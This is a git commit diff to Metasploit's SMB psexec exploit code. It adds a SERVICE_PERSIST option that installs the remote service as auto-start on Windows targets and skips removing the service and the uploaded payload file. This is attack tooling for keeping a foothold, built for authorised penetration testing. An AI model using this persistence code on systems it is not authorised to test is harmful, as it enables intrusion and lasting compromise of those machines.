Auto persist

2014-04-05 18:50:49 +01:00 · 2014-04-05 18:50:49 +01:00 · 2c9209f8b1
parent fd7f35d8b2
commit 2c9209f8b1
2 changed files with 36 additions and 10 deletions
--- a/lib/msf/core/exploit/smb/psexec.rb
+++ b/lib/msf/core/exploit/smb/psexec.rb
@ -23,18 +23,34 @@ module Exploit::Remote::SMB::Psexec
        OptString.new('SERVICE_DISPLAY_NAME', [ false, 'The service display name', nil]),
        OptString.new('SERVICE_DESCRIPTION', [false, "Service description to to be used on target for pretty listing",nil])
      ], self.class)
+
+    register_advanced_options(
+      [
+        OptBool.new('SERVICE_PERSIST', [ true, 'Create an Auto run service and do not remove it.', false])
+      ], self.class)
  end

+  # Retrieve the SERVICE_NAME option, generate a random
+  # one if not already set.
+  #
+  # @return service_name [String] the name of the service.
  def service_name
    @service_name ||= datastore['SERVICE_NAME']
    @service_name ||= rand_text_alpha(8)
  end

+  # Retrieve the SERVICE_DISPLAY_NAME option, generate a random
+  # one if not already set.
+  #
+  # @return service_display_name [String] the display name of the service.
  def display_name
    @display_name ||= datastore['SERVICE_DISPLAY_NAME']
    @display_name ||= rand_text_alpha(16)
  end

+  # Retrieve the SERVICE_DESCRIPTION option
+  #
+  # @return service_description [String] the service description.
  def service_description
    @service_description ||= datastore['SERVICE_DESCRIPTION']
  end
@ -89,8 +105,14 @@ module Exploit::Remote::SMB::Psexec

    return false unless scm_handle

+    if datastore['SERVICE_PERSIST']
+      opts = { :start => SERVICE_AUTO_START }
+    else
+      opts = {}
+    end
+
    vprint_status("#{peer} - Creating the service...")
-    svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, {})
+    svc_handle, svc_status = dce_createservicew(dcerpc, scm_handle, service_name, display_name, command, opts)

    case svc_status
    when ERROR_SUCCESS
@ -133,6 +155,8 @@ module Exploit::Remote::SMB::Psexec
          # Maybe we could have a force cleanup option..?
          if service_exists
            print_warning("#{peer} - Not removing service as it already existed...")
+          elsif datastore['SERVICE_PERSIST']
+            print_warning("#{peer} - Not removing service for persistance...")
          else
            vprint_status("#{peer} - Removing the service...")
            svc_status = dce_deleteservice(dcerpc, svc_handle)
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@ -196,15 +196,17 @@ class Metasploit3 < Msf::Exploit::Remote

      psexec(file_location, false)

-      print_status("Deleting \\#{filename}...")
-      sleep(1)
-      #This is not really useful but will prevent double \\ on the wire :)
-      if datastore['SHARE'] =~ /.[\\\/]/
-        simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
-        simple.delete("\\#{fileprefix}\\#{filename}")
-      else
-        simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
-        simple.delete("\\#{filename}")
+      unless datastore['SERVICE_PERSIST']
+        print_status("Deleting \\#{filename}...")
+        sleep(1)
+        #This is not really useful but will prevent double \\ on the wire :)
+        if datastore['SHARE'] =~ /.[\\\/]/
+          simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+          simple.delete("\\#{fileprefix}\\#{filename}")
+        else
+          simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
+          simple.delete("\\#{filename}")
+        end
      end
    end
    handler